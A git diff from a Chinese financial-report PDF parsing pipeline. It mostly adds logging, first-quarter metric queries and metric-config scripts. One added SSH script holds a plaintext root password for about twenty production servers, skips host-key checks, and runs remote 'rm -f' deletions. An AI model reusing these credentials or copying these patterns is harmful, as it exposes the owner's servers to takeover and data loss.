print(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
continue continue
if vector_distance > distance and table_num not in parent_table_pages: if vector_distance > distance and table_num not in parent_table_pages:
#检测规则开始 #检测规则开始
#判断抽取指标和财报指标周期是否相同 #判断抽取指标和财报指标周期是否相同
ori_period = utils.get_period_type(ori_measure_name, report_year) ori_period = utils.get_period_type(ori_measure_name, report_year)
pdf_period = utils.get_period_type(pdf_measure, report_year) pdf_period = utils.get_period_type(pdf_measure, report_year)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
print(f'第1处{ori_period}{pdf_period}') logger.info(f'第1处{ori_period}{pdf_period}')
if(ori_period != pdf_period): if(ori_period != pdf_period):
continue continue
@ -429,7 +464,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
start_ori_period = utils.get_start_period_type(ori_measure_name) start_ori_period = utils.get_start_period_type(ori_measure_name)
start_pdf_period = utils.get_start_period_type(pdf_measure) start_pdf_period = utils.get_start_period_type(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
print(f'第2处{start_ori_period}{start_pdf_period}') logger.info(f'第2处{start_ori_period}{start_pdf_period}')
if(start_ori_period != start_pdf_period): if(start_ori_period != start_pdf_period):
continue continue
@ -437,7 +472,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
ori_season_type = utils.get_season_flag(ori_measure_name) ori_season_type = utils.get_season_flag(ori_measure_name)
pdf_season_type = utils.get_season_flag(pdf_measure) pdf_season_type = utils.get_season_flag(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
print(f'第3处{ori_season_type}{pdf_season_type}') logger.info(f'第3处{ori_season_type}{pdf_season_type}')
if(ori_season_type != pdf_season_type): if(ori_season_type != pdf_season_type):
continue continue
@ -445,7 +480,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
ori_kf_type = utils.get_kf_flag(ori_measure_name) ori_kf_type = utils.get_kf_flag(ori_measure_name)
pdf_kf_type = utils.get_kf_flag(pdf_measure) pdf_kf_type = utils.get_kf_flag(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
print(f'第4处{ori_kf_type}{pdf_kf_type}') logger.info(f'第4处{ori_kf_type}{pdf_kf_type}')
if(ori_kf_type != pdf_kf_type): if(ori_kf_type != pdf_kf_type):
continue continue
@ -453,7 +488,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
ori_type = utils.get_percent_flag(ori_measure_name) ori_type = utils.get_percent_flag(ori_measure_name)
pdf_type = utils.get_percent_flag(pdf_measure) pdf_type = utils.get_percent_flag(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
print(f'第5处{ori_type}{pdf_type}') logger.info(f'第5处{ori_type}{pdf_type}')
if(ori_type != pdf_type): if(ori_type != pdf_type):
continue continue
@ -461,7 +496,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
ori_growth_type = utils.get_percent_growth(ori_measure_name) ori_growth_type = utils.get_percent_growth(ori_measure_name)
pdf_growth_type = utils.get_percent_growth(pdf_measure) pdf_growth_type = utils.get_percent_growth(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
print(f'第6处{ori_growth_type}{pdf_growth_type}') logger.info(f'第6处{ori_growth_type}{pdf_growth_type}')
if(ori_growth_type != pdf_growth_type): if(ori_growth_type != pdf_growth_type):
continue continue
@ -531,7 +566,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
cursor.execute(insert_query, data_to_insert) cursor.execute(insert_query, data_to_insert)
conn.commit() conn.commit()
except Exception as e: except Exception as e:
print(e) logger.info(e)
finally: finally:
parent_table_pages = [] parent_table_pages = []
client.close() client.close()
@ -550,6 +585,10 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config
where year = '{year}' where year = '{year}'
'''.format(year=report_year) '''.format(year=report_year)
select_query_first_quarter = '''
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
where year = '{year}'
'''.format(year=report_year)
select_query_half_year = ''' select_query_half_year = '''
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_half_year SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_half_year
where year = '{year}' where year = '{year}'
@ -574,8 +613,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
cursor.execute(select_query_half_year) cursor.execute(select_query_half_year)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
print('insert_table_measure_from_vector_async_process方法走的半年报') logger.info(f'insert_table_measure_from_vector_async_process方法走的半年报')
start_time = time.time() start_time = time.time()
records_range_parts = utils.get_range(len(records),MEASURE_COUNT) records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
processes = [] processes = []
@ -583,13 +622,27 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array, partition_name)) p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array, partition_name))
processes.append(p) processes.append(p)
p.start() p.start()
elif report_type == 2:
start_time = time.time()
cursor.execute(select_query_first_quarter)
records = cursor.fetchall()
end_time = time.time()
logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
logger.info(f'insert_table_measure_from_vector_async_process方法走的一季报')
start_time = time.time()
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
processes = []
for record_range in records_range_parts:
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name))
processes.append(p)
p.start()
elif report_type == 3: elif report_type == 3:
start_time = time.time() start_time = time.time()
cursor.execute(select_query_thrid) cursor.execute(select_query_thrid)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
print('insert_table_measure_from_vector_async_process方法走的三季报') logger.info(f'insert_table_measure_from_vector_async_process方法走的三季报')
start_time = time.time() start_time = time.time()
records_range_parts = utils.get_range(len(records),MEASURE_COUNT) records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
processes = [] processes = []
@ -603,8 +656,8 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
cursor.execute(select_query) cursor.execute(select_query)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
print('insert_table_measure_from_vector_async_process方法走的全年报') logger.info(f'insert_table_measure_from_vector_async_process方法走的全年报')
start_time = time.time() start_time = time.time()
records_range_parts = utils.get_range(len(records),MEASURE_COUNT) records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
processes = [] processes = []
@ -613,13 +666,13 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
processes.append(p) processes.append(p)
p.start() p.start()
print('等待所有子任务完成任务ID:', file_id) logger.info(f'等待所有子任务完成任务ID:{file_id}' )
for p in processes: for p in processes:
p.join() p.join()
print('所有子任务完成任务ID:', file_id) logger.info(f'所有子任务完成任务ID:{file_id}')
print('启动指标归一化任务ID:', file_id) logger.info(f'启动指标归一化任务ID:{file_id}')
end_time = time.time() end_time = time.time()
print(f"向量更新时间 {(end_time - start_time):.2f} 秒。") logger.info(f"向量更新时间 {(end_time - start_time):.2f} 秒。")
def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,file_name): def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,file_name):
create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S") create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
@ -646,7 +699,7 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
cursor.execute(select_query) cursor.execute(select_query)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
start_time = time.time() start_time = time.time()
@ -708,9 +761,9 @@ def insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_
cursor.execute(insert_query, data_to_insert) cursor.execute(insert_query, data_to_insert)
conn.commit() conn.commit()
except Exception as e: except Exception as e:
print(e) logger.info(e)
end_time = time.time() end_time = time.time()
print(f"向量更新数据时间 {(end_time - start_time):.2f} 秒。") logger.info(f"向量更新数据时间 {(end_time - start_time):.2f} 秒。")
start_time = time.time() start_time = time.time()
@ -720,6 +773,7 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
(file_id, page_num, content) (file_id, page_num, content)
VALUES (%s, %s, %s) VALUES (%s, %s, %s)
''' '''
for table in table_info: for table in table_info:
try: try:
data=[] data=[]
@ -730,6 +784,12 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
measure_list = table['measure_list'] measure_list = table['measure_list']
for measure in measure_list: for measure in measure_list:
measure_name = measure['measure_name'] measure_name = measure['measure_name']
# 需要跳过的一些指标
black_list = ["营业总成本"]
if any(black in measure_name for black in black_list):
continue
measure_value = measure['measure_value'].replace("(", "").replace(")", "") measure_value = measure['measure_value'].replace("(", "").replace(")", "")
measure_name = utils.get_clean_text(measure_name) measure_name = utils.get_clean_text(measure_name)
measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')#这个真绝了,怎么都删不掉 measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')#这个真绝了,怎么都删不掉
@ -745,7 +805,9 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末') measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
measure_unit = measure['measure_unit'] measure_unit = measure['measure_unit']
if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords): if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
vector_obj = utils.embed_with_str(measure_name_1) vector_obj = utils.embed_with_str(measure_name_1)
vector = vector_obj.output["embeddings"][0]["embedding"] vector = vector_obj.output["embeddings"][0]["embedding"]
measure_data = {} measure_data = {}
measure_data['vector'] = vector measure_data['vector'] = vector
@ -800,18 +862,18 @@ def insert_measure_data_to_milvus(client,partition_name,table_info,cursor,conn):
data=data, data=data,
partition_name=partition_name partition_name=partition_name
) )
logger.info(f"向量插入结束")
except Exception as e: except Exception as e:
print(e) logger.info(e)
def runing_job(): def runing_job():
conn = mysql.connector.connect( conn = mysql.connector.connect(
host= MYSQL_HOST, host = MYSQL_HOST,
user= MYSQL_USER, user = MYSQL_USER,
password= MYSQL_PASSWORD, password = MYSQL_PASSWORD,
database= MYSQL_DB database = MYSQL_DB
) )
# 创建一个cursor对象来执行SQL语句 # 创建一个cursor对象来执行SQL语句
cursor = conn.cursor(buffered=True) cursor = conn.cursor(buffered=True)
select_query = ''' select_query = '''
@ -856,7 +918,8 @@ def delete_database(conn,cursor,file_id):
cursor.execute(truncate,(file_id,)) cursor.execute(truncate,(file_id,))
conn.commit() conn.commit()
except Exception as e: except Exception as e:
print(f'删除失败,原因是{e}') logger.info(f'删除失败,原因是{e}')
def delete_to_run(conn,cursor,file_id): def delete_to_run(conn,cursor,file_id):
try: try:
truncate_query = [ truncate_query = [
@ -875,23 +938,23 @@ def delete_to_run(conn,cursor,file_id):
cursor.execute(truncate,(file_id,)) cursor.execute(truncate,(file_id,))
conn.commit() conn.commit()
except Exception as e: except Exception as e:
print(f'删除失败,原因是{e}') logger.info(f'删除失败,原因是{e}')
def insert_pdf_text_info(table_info,conn,cursor): def insert_pdf_text_info(table_info,conn,cursor):
# 执行SQL语句插入数据
insert_query = ''' insert_query = '''
INSERT INTO pdf_text_info INSERT INTO pdf_text_info
(file_id, page_num, text) (file_id, page_num, text)
VALUES (%s, %s, %s) VALUES (%s, %s, %s)
''' '''
file_id = table_info['file_id'] file_id = table_info['file_id']
page_num = int(table_info['page_num']) page_num = table_info['page_num']
text = table_info['text'] text = table_info['text']
data_to_insert = (file_id, page_num, text) data_to_insert = (file_id, page_num, text)
cursor.execute(insert_query, data_to_insert) cursor.execute(insert_query, data_to_insert)
conn.commit() conn.commit()
def process_time(file_id,type,time,start_time,end_time): def process_time(file_id,type,time,start_time,end_time):
conn = mysql.connector.connect( conn = mysql.connector.connect(
host= MYSQL_HOST, host= MYSQL_HOST,
@ -911,6 +974,7 @@ def process_time(file_id,type,time,start_time,end_time):
data_insert = (file_id,type,time,start_time,end_time) data_insert = (file_id,type,time,start_time,end_time)
cursor.execute(insert_query,data_insert) cursor.execute(insert_query,data_insert)
conn.commit() conn.commit()
def batch_insert_page_text_nocheck(table_info, conn, cursor): def batch_insert_page_text_nocheck(table_info, conn, cursor):
file_id = table_info['file_id'] file_id = table_info['file_id']
page_num = int(table_info['page_num']) page_num = int(table_info['page_num'])
@ -923,6 +987,7 @@ def batch_insert_page_text_nocheck(table_info, conn, cursor):
data_to_insert = [(file_id, page_num, text) for text in text_lines] data_to_insert = [(file_id, page_num, text) for text in text_lines]
cursor.executemany(insert_query, data_to_insert) cursor.executemany(insert_query, data_to_insert)
conn.commit() conn.commit()
def batch_insert_page_text(table_info, conn, cursor): def batch_insert_page_text(table_info, conn, cursor):
file_id = table_info['file_id'] file_id = table_info['file_id']
page_num = int(table_info['page_num']) page_num = int(table_info['page_num'])
@ -945,6 +1010,7 @@ def batch_insert_page_text(table_info, conn, cursor):
else: else:
pass pass
conn.commit() conn.commit()
def file_type_check(file_id): def file_type_check(file_id):
conn = mysql.connector.connect( conn = mysql.connector.connect(
host= MYSQL_HOST, host= MYSQL_HOST,
@ -965,6 +1031,7 @@ def file_type_check(file_id):
finally: finally:
cursor.close() cursor.close()
conn.close() conn.close()
def file_type_check_v2(file_id): def file_type_check_v2(file_id):
conn = mysql.connector.connect( conn = mysql.connector.connect(
host= MYSQL_HOST, host= MYSQL_HOST,
@ -989,10 +1056,10 @@ def file_type_check_v2(file_id):
def pdf_title_insert_mysql(file_id,title_array): def pdf_title_insert_mysql(file_id,title_array):
conn = mysql.connector.connect( conn = mysql.connector.connect(
host= MYSQL_HOST, host = MYSQL_HOST,
user= MYSQL_USER, user = MYSQL_USER,
password= MYSQL_PASSWORD, password = MYSQL_PASSWORD,
database= MYSQL_DB database = MYSQL_DB
) )
cursor = conn.cursor(buffered=True) cursor = conn.cursor(buffered=True)
for item in title_array: for item in title_array:
@ -1003,13 +1070,12 @@ def pdf_title_insert_mysql(file_id,title_array):
cursor.close() cursor.close()
conn.close() conn.close()
def get_file_info_from_mysql(file_id): def get_file_info_from_mysql(file_id):
conn = mysql.connector.connect( conn = mysql.connector.connect(
host= MYSQL_HOST, host = MYSQL_HOST,
user= MYSQL_USER, user = MYSQL_USER,
password= MYSQL_PASSWORD, password = MYSQL_PASSWORD,
database= MYSQL_DB database = MYSQL_DB
) )
#cursor = conn.cursor(buffered=True) #cursor = conn.cursor(buffered=True)
cursor = conn.cursor(dictionary=True) cursor = conn.cursor(dictionary=True)

View File

@ -0,0 +1,84 @@
#报错提示
import paramiko
import time
import threading
# 执行命令的函数
def execute_commands_on_server(hostname, username, password, host):
try:
# 连接到服务器
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=hostname, username=username, password=password)
# 执行命令
shell = client.invoke_shell()
#启动docker
shell.send("cd /root/pdf_parser/pdf\n")
time.sleep(1)
shell.send("rm -f *.pdf\n")
time.sleep(10)
shell.send("rm -f *.PDF\n")
time.sleep(10)
# 读取输出
output = shell.recv(2048).decode()
print(f"Output from {hostname}:\n{output}")
except paramiko.SSHException as e:
print(f"SSH connection error with {hostname}: {e}")
finally:
client.close()
# 创建线程函数
def thread_function(server):
execute_commands_on_server(server['hostname'], server['username'], server['password'], server['host'])
# 服务器列表
# servers = [
# {'hostname': 'server1.example.com', 'username': 'user1', 'password': 'pass1', 'host': 'host1'},
# {'hostname': 'server2.example.com', 'username': 'user2', 'password': 'pass2', 'host': 'host2'},
# # 添加更多服务器
# ]
servers = [
#{'hostname': '124.70.129.232', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'测试服务器'},
# {'hostname': '1.94.179.121', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器'},#废弃
#旧10台
{'hostname': '113.44.72.157', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器1'},
{'hostname': '1.94.101.237', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器2'},
{'hostname': '123.60.16.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器3'},
{'hostname': '124.71.157.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器4'},
{'hostname': '1.94.60.103', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器5'},
{'hostname': '1.94.143.23', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器6'},#都往这里存
{'hostname': '124.71.149.225', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器7'},
{'hostname': '113.44.52.221', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器8'},
{'hostname': '121.37.137.13', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器9'},
{'hostname': '123.60.28.83', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'生产服务器10'},
#新10台
{'hostname': '192.168.0.19', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器1'},
{'hostname': '192.168.0.53', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器2'},
{'hostname': '192.168.0.150', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器3'},
{'hostname': '192.168.0.210', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器4'},
{'hostname': '192.168.0.129', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器5'},
{'hostname': '192.168.0.24', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器6'},
{'hostname': '192.168.0.250', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器7'},
{'hostname': '192.168.0.162', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器8'},
{'hostname': '192.168.0.86', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器9'},
{'hostname': '192.168.0.88', 'username': 'root', 'password': 's6fQeVQmxxNv','host':'新生产服务器10'},
]
# 创建并启动线程
threads = []
for server in servers:
thread = threading.Thread(target=thread_function, args=(server,))
threads.append(thread)
thread.start()
# 等待所有线程完成
for thread in threads:
thread.join()
print("All commands executed.")

View File

@ -0,0 +1,246 @@
import pandas as pd
import mysql.connector
import utils
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
import re
import redis
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
# 读取第一个 Excel 文件
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
# 将 DataFrame 转换为字典列表
data_list = df.to_dict(orient='records')
# 连接到 MySQL 数据库
conn = mysql.connector.connect(
host=MYSQL_HOST,
user=MYSQL_USER,
password=MYSQL_PASSWORD,
database=MYSQL_DB
)
cursor = conn.cursor()
# 插入数据到 measure_create_config 表
insert_query = '''
INSERT INTO measure_create_config
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
VALUES (%s, %s, %s, %s, %s, %s)
'''
for data in data_list:
show_measure = str(data['指标'])
same_mean_measure = str(data['同义表述'])
period_measure = str(data['周期'])
change_measure = str(data['变动'])
black_list = str(data['黑名单词'])
config_id = utils.get_md5(show_measure)
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
cursor.execute(insert_query, insert_query_data)
conn.commit()
# 读取第二个 Excel 文件
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
# 将 DataFrame 转换为字典列表
period_list = df_period.to_dict(orient='records')
# 插入数据到 measure_create_period 表
period_insert_query = '''
INSERT INTO measure_create_period
(period_name, same_mean_period)
VALUES (%s, %s)
'''
for data in period_list:
period_name = str(data['标准表述'])
same_mean_period = str(data['同义表述'])
insert_query_data = (period_name, same_mean_period)
cursor.execute(period_insert_query, insert_query_data)
conn.commit()
# 查询数据库
data_query = '''
SELECT * FROM measure_create_config WHERE delete_status = 0
'''
period_query = '''
SELECT * FROM measure_create_period
'''
cursor.execute(data_query)
data_list = cursor.fetchall()
cursor.execute(period_query)
period_list = cursor.fetchall()
# 输出到文件
with open(output_file_path, 'w', encoding='utf-8') as file:
for data in data_list:
config_id = data[0]
show_measure = data[1]
same_mean_measure = data[2]
period_measure = data[3]
change_measure = data[4]
same_mean_measure_arr = []
period_measure_arr = []
change_measure_arr = []
if same_mean_measure != 'nan':
same_mean_measure_arr = same_mean_measure.split(',')
same_mean_measure_arr.append(show_measure)
if period_measure != 'nan':
period_measure_arr = period_measure.split(',')
if change_measure != 'nan':
change_measure_arr = change_measure.split(',')
for c in change_measure_arr:
period_measure_arr.append(c)
for x in period_measure_arr:
if x in change_measure_arr:
show_name = show_measure + x
else:
show_name = x + show_measure
for y in same_mean_measure_arr:
if x in change_measure:
parser_name = y + x
else:
parser_name = x + y
file.write(f'{show_name},{parser_name}\n')
for p in period_list:
period_exra_name = p[0]
period_exra_value = p[1]
if period_exra_name in x:
for v in period_exra_value.split(','):
if x in change_measure:
parser_name = y + x.replace(period_exra_name, v)
else:
parser_name = x.replace(period_exra_name, v) + y
file.write(f'{show_name},{parser_name}\n')
cursor.close()
conn.close()
# 根据老指标配置表生成新指标配置表
def create_new_config(conn, cursor, table_name,old_year,new_year):
select_query = f'''
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
FROM {table_name}
WHERE year = '{old_year}'
'''
cursor.execute(select_query)
data_list = cursor.fetchall()
insert_query = f'''
INSERT INTO {table_name}
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
'''
for data in data_list:
ori_measure_name = data[3]
if re.match(r'^\d{4}',ori_measure_name):
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
year += 1
ori_measure_name = str(year) + ori_measure_name[4:]
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
cursor.execute(insert_query, insert_data)
conn.commit()
def measure_config_to_db(conn, cursor, table_name):
year_list = ["2021","2022","2023","2024","2025"]
for year in year_list:
insert_query = f'''
INSERT INTO {table_name}
(measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
VALUES (%s, %s, %s, %s,%s,%s,%s)
'''
check_query = f'''
SELECT ori_measure_id FROM {table_name}
WHERE year = '{year}'
'''
# 新增指标
lines = [
f"当期营业收入,{year}年第一季度营业收入",
f"当期归母净利润,{year}年第一季度归母净利润",
f"当期扣非净利润,{year}年第一季度扣非净利润",
f"当期经营活动现金流净额,{year}年第一季度经营活动现金流净额",
f"当期筹资活动现金流净额,{year}年第一季度筹资活动现金流净额",
f"当期投资活动现金流净额,{year}年第一季度投资活动现金流净额",
f"当期非经常性损益,{year}年第一季度非经常性损益",
f"当期基本每股收益,{year}年第一季度基本每股收益",
f"当期稀释每股收益,{year}年第一季度稀释每股收益",
f"当期加权平均净资产收益率,{year}年第一季度加权平均净资产收益率",
f"当期扣非加权平均净资产收益率,{year}年第一季度扣非加权平均净资产收益率",
f"当期营业成本 ,{year}年第一季度营业成本",
f"当期销售费用,{year}年第一季度销售费用",
f"当期管理费用,{year}年第一季度管理费用",
f"当期财务费用,{year}年第一季度财务费用",
f"当期研发费用,{year}年第一季度研发费用"]
# 打印每一行
for line in lines:
config_list = line.strip().split(',')
measure = config_list[0]
ori_measure = config_list[1]
ori_measure_id = utils.get_md5(ori_measure)
# 判断数据库中是否有数据
cursor.execute(check_query)
check_records = cursor.fetchall()
if any(record[0] == ori_measure_id for record in check_records):
continue
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
cursor.execute(insert_query, data_to_insert)
conn.commit()
def insert_measure_vector(conn,cursor,table_name):
from config import REDIS_HOST,REDIS_PASSWORD,REDIS_PORT
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)# 192.168.0.172 #测试123.60.153.169
# 执行SQL语句更新数据
select_query = f'''
SELECT ori_measure_id,ori_measure_name FROM {table_name}
'''
cursor.execute(select_query)
records = cursor.fetchall()
print(f"总计{len(records)}条数据")
for record in records:
if redis_client.hexists('measure_config', record[0]):
measure_vector = redis_client.hget('measure_config', record[0])
else:
print('新增指标',record[1])
vector_obj = utils.embed_with_str(record[1])
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
redis_client.hset('measure_config', record[0], measure_vector)
redis_client.close()
conn.close()
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
if __name__ == "__main__":
#需要先清空本地数据库的 measure_create_config 和 measure_create_period 表
# process_excel_and_db(
# 'F:\\11_pdf\\ttt_1.xlsx',#ttt文件
# 'F:\\11_pdf\\period_1.xlsx',#period文件
# 'F:\\11_pdf\\out_2022_new_year.txt'#输出文件
# )
from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
conn = mysql.connector.connect(
host=MYSQL_HOST_APP,
user=MYSQL_USER_APP,
password=MYSQL_PASSWORD_APP,
database=MYSQL_DB_APP
)
cursor = conn.cursor()
#file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
# 更新第一季度的measure_vector
table_name = 'measure_config'
# 写入mysql
# measure_config_to_db(conn, cursor, table_name)
create_new_config(conn, cursor, table_name,'2023','2024')
# 插入redies
insert_measure_vector(conn,cursor,table_name)

View File

@ -0,0 +1,51 @@
import logging
import os
from logging.handlers import RotatingFileHandler
def setup_logging():
# 创建logs目录如果不存在
log_dir = 'logs'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# 配置根日志记录器
root_logger = logging.getLogger()
# 如果已经有handlers先移除它们以防重复
if root_logger.handlers:
for handler in root_logger.handlers[:]:
root_logger.removeHandler(handler)
root_logger.setLevel(logging.INFO)
# 创建格式化器
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
# 创建文件处理器
file_handler = RotatingFileHandler(
os.path.join(log_dir, 'app.log'),
maxBytes=10*1024*1024, # 10MB
backupCount=5
)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
# 创建控制台处理器
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(formatter)
# 添加处理器到根日志记录器
root_logger.addHandler(file_handler)
root_logger.addHandler(console_handler)
# 设置propagate=False以防止日志消息向上传播
for logger_name in logging.root.manager.loggerDict:
logger = logging.getLogger(logger_name)
logger.propagate = False
return root_logger
logger = setup_logging()

View File

@ -22,8 +22,7 @@ from multiprocessing import Process
from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD from config import REDIS_HOST,REDIS_PORT,REDIS_PASSWORD
import redis import redis
from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
from log_config import logger
''' '''
已知发现问题 已知发现问题
@ -40,7 +39,7 @@ from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Colle
STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入|计入当期损益的政府补助' STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入|计入当期损益的政府补助'
